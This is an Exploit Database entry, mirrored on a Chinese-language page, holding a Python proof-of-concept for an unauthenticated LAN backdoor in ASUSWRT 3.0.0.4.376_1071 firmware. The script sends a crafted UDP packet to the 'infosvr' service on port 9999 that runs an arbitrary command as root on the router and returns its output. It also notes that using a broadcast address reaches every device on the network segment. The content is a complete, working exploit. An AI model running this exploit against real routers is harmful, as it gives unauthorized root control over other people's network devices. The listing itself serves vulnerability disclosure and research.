ASUSWRT 3.0.0.4.376_1071 – LAN Backdoor Command Execution

• Exploit Database
• 95 阅读

• 作者： Friedrich Postelstorfer
  日期： 2015-01-04
• 类别：

  • remote
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/35688/

• #!/usr/bin/env python3
  
  # Exploit Title: ASUSWRT 3.0.0.4.376_1071 LAN Backdoor Command Execution
  # Date: 2014-10-11
  # Vendor Homepage: http://www.asus.com/
  # Software Link: http://dlcdnet.asus.com/pub/ASUS/wireless/RT-N66U_B1/FW_RT_N66U_30043762524.zip
  # Source code: http://dlcdnet.asus.com/pub/ASUS/wireless/RT-N66U_B1/GPL_RT_N66U_30043762524.zip
  # Tested Version: 3.0.0.4.376_1071-g8696125
  # Tested Device: RT-N66U
  
  # Description:
  # A service called "infosvr" listens on port 9999 on the LAN bridge.
  # Normally this service is used for device discovery using the
  # "ASUS Wireless Router Device Discovery Utility", but this service contains a
  # feature that allows an unauthenticated user on the LAN to execute commands
  # <= 237 bytes as root. Source code is in asuswrt/release/src/router/infosvr.
  # "iboxcom.h" is in asuswrt/release/src/router/shared.
  #
  # Affected devices may also include wireless repeaters and other networking
  # products, especially the ones which have "Device Discovery" in their features
  # list.
  #
  # Using broadcast address as the IP address should work and execute the command
  # on all devices in the network segment, but only receiving one response is
  # supported by this script.
  
  import sys, os, socket, struct
  
  
  PORT = 9999
  
  if len(sys.argv) < 3:
  print('Usage: ' + sys.argv[0] + ' <ip> <command>', file=sys.stderr)
  sys.exit(1)
  
  
  ip = sys.argv[1]
  cmd = sys.argv[2]
  
  enccmd = cmd.encode()
  
  if len(enccmd) > 237:
  # Strings longer than 237 bytes cause the buffer to overflow and possibly crash the server. 
  print('Values over 237 will give rise to undefined behaviour.', file=sys.stderr)
  sys.exit(1)
  
  sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
  sock.bind(('0.0.0.0', PORT))
  sock.settimeout(2)
  
  # Request consists of following things
  # ServiceID [byte]; NET_SERVICE_ID_IBOX_INFO
  # PacketType[byte]; NET_PACKET_TYPE_CMD
  # OpCode[word]; NET_CMD_ID_MANU_CMD
  # Info[dword] ; Comment: "Or Transaction ID"
  # MacAddress[byte[6]] ; Double-wrongly "checked" with memcpy instead of memcmp
  # Password[byte[32]]; Not checked at all
  # Length[word]
  # Command [byte[420]] ; 420 bytes in struct, 256 - 19 unusable in code = 237 usable
  
  packet = (b'\x0C\x15\x33\x00' + os.urandom(4) + (b'\x00' * 38) + struct.pack('<H', len(enccmd)) + enccmd).ljust(512, b'\x00')
  
  sock.sendto(packet, (ip, PORT))
  
  
  # Response consists of following things
  # ServiceID [byte]; NET_SERVICE_ID_IBOX_INFO
  # PacketType[byte]; NET_PACKET_TYPE_RES
  # OpCode[word]; NET_CMD_ID_MANU_CMD
  # Info[dword] ; Equal to Info of request
  # MacAddress[byte[6]] ; Filled in for us
  # Length[word]
  # Result[byte[420]] ; Actually returns that amount
  
  while True:
  data, addr = sock.recvfrom(512)
  
  if len(data) == 512 and data[1] == 22:
  break
  
  length = struct.unpack('<H', data[14:16])[0]
  s = slice(16, 16+length)
  sys.stdout.buffer.write(data[s])
  
  sock.close()
  

  Python

  Copy